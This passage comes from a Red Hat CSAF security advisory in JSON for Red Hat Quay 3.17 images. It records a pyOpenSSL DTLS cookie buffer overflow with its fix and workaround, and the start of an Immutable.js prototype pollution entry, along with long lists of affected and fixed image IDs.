          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "RHBZ#2448503",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448503"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27459",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst",
          "url": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408",
          "url": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4",
          "url": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4"
        }
      ],
      "release_date": "2026-03-17T23:34:28.483000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "To mitigate this flaw, ensure the callback provided to the set_cookie_generate_callback function strictly limits the returned cookie string or byte sequence to under 256 bytes.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "pyOpenSSL: DTLS cookie callback buffer overflow"
    },
    {
      "cve": "CVE-2026-29063",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-03-06T19:00:57.982727+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445291"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
